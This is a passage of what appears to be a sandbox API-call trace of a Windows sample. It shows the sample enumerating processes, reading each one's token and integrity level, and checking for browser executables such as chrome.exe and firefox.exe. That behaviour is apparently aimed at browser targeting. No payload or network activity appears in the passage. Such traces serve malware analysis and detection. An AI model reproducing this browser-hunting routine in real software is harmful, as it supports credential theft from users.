TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0315.262] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0315.262] CloseHandle (hObject=0x5b0) returned 1 [0315.262] CloseHandle (hObject=0x444) returned 1 [0315.262] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x444 [0315.262] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247fc0, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.262] OpenProcessToken (in: ProcessHandle=0x444, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x5b0) returned 1 [0315.262] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0315.262] GetLastError () returned 0x7a [0315.262] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0315.262] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0315.262] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0315.262] CloseHandle (hObject=0x5b0) returned 1 [0315.262] CloseHandle (hObject=0x444) returned 1 [0315.262] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0315.262] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0315.262] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0315.262] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0315.262] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0315.263] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0315.263] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0315.263] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0317.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xac00) returned 0xc0000004 [0317.265] VirtualAlloc (lpAddress=0x0, dwSize=0xbc00, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0317.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbc00, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0317.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0317.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0317.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0317.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0317.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0317.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0317.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0317.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0317.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0317.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0317.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0317.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3cc [0317.269] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.269] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.269] GetLastError () returned 0x7a [0317.269] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.270] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.270] CloseHandle (hObject=0x444) returned 1 [0317.270] CloseHandle (hObject=0x3cc) returned 1 [0317.270] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3cc [0317.270] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2487e8, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.270] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.270] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.270] GetLastError () returned 0x7a [0317.271] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.271] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.271] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.271] CloseHandle (hObject=0x444) returned 1 [0317.271] CloseHandle (hObject=0x3cc) returned 1 [0317.272] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0317.272] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0317.272] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0317.272] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0317.272] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0317.272] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0317.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0317.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x3cc [0317.272] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.273] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.273] GetLastError () returned 0x7a [0317.273] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.273] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.273] CloseHandle (hObject=0x444) returned 1 [0317.273] CloseHandle (hObject=0x3cc) returned 1 [0317.273] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x3cc [0317.273] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x246960, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.274] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.274] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.274] GetLastError () returned 0x7a [0317.274] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.274] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.274] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.274] CloseHandle (hObject=0x444) returned 1 [0317.274] CloseHandle (hObject=0x3cc) returned 1 [0317.275] lstrcmpiW (lpString1="firefox.exe", lpString2="userinit.exe") returned -1 [0317.275] lstrcmpiW (lpString1="chrome.exe", lpString2="userinit.exe") returned -1 [0317.275] lstrcmpiW (lpString1="opera.exe", lpString2="userinit.exe") returned -1 [0317.275] lstrcmpiW (lpString1="iexplore.exe", lpString2="userinit.exe") returned -1 [0317.275] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="userinit.exe") returned -1 [0317.275] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="userinit.exe") returned -1 [0317.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x3cc [0317.276] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.276] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.276] GetLastError () returned 0x7a [0317.276] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.276] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.276] CloseHandle (hObject=0x444) returned 1 [0317.276] CloseHandle (hObject=0x3cc) returned 1 [0317.276] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x3cc [0317.277] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x246fe0, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.277] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.277] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.277] GetLastError () returned 0x7a [0317.277] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.277] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.277] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.277] CloseHandle (hObject=0x444) returned 1 [0317.277] CloseHandle (hObject=0x3cc) returned 1 [0317.278] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0317.278] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0317.278] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0317.278] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0317.278] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0317.278] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0317.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x3cc [0317.279] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.279] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.279] GetLastError () returned 0x7a [0317.279] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.279] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.279] CloseHandle (hObject=0x444) returned 1 [0317.279] CloseHandle (hObject=0x3cc) returned 1 [0317.279] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x3cc [0317.280] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247178, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.280] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.280] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.280] GetLastError () returned 0x7a [0317.281] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.281] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.281] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.281] CloseHandle (hObject=0x444) returned 1 [0317.281] CloseHandle (hObject=0x3cc) returned 1 [0317.282] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0317.282] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0317.282] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0317.282] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0317.282] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0317.282] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0317.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0317.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x3cc [0317.282] OpenProcessToken (in: ProcessHandle=0x3cc, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.282] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.283] GetLastError () returned 0x7a [0317.283] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.283] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.283] CloseHandle (hObject=0x444) returned 1 [0317.283] CloseHandle (hObject=0x3cc) returned 1 [0317.283] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x3d0 [0317.308] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247a80, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.308] OpenProcessToken (in: ProcessHandle=0x3d0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.309] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.309] GetLastError () returned 0x7a [0317.309] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.309] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.309] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.309] CloseHandle (hObject=0x444) returned 1 [0317.309] CloseHandle (hObject=0x3d0) returned 1 [0317.309] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.309] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.309] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0317.309] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.309] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.309] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0317.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x3d0 [0317.309] OpenProcessToken (in: ProcessHandle=0x3d0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0317.309] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0317.309] GetLastError () returned 0x7a [0317.309] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x235d130, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x235d130, ReturnLength=0x275fc44) returned 1 [0317.309] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0317.309] CloseHandle (hObject=0x444) returned 1 [0317.309] CloseHandle (hObject=0x3d0) returned 1 [0317.310] GetLengthSid (pSid=0x235d138*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0317.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x3d0 [0317.310] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x247e28, dwBuildNumber=0xf7007f88, dwPlatformId=0x238efe8, szCSDVersion="\x01") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0317.310] OpenProcessToken (in: ProcessHandle=0x3d0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0317.310] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0317.310] GetLastError () returned 0x7a [0317.310] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x2350d08, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x2350d08, ReturnLength=0x275fc70) returned 1 [0317.310] GetSidSubAuthorityCount (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x2350d11 [0317.310] GetSidSubAuthority (pSid=0x2350d10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x2350d18 [0317.310] CloseHandle (hObject=0x444) returned 1 [0317.310] CloseHandle (hObject=0x3d0) returned 1 [0317.310] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0317.310] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0317.310] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0317.310] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0317.310] lstrcmpiW (lpString1="MicrosoftEdge.exe", 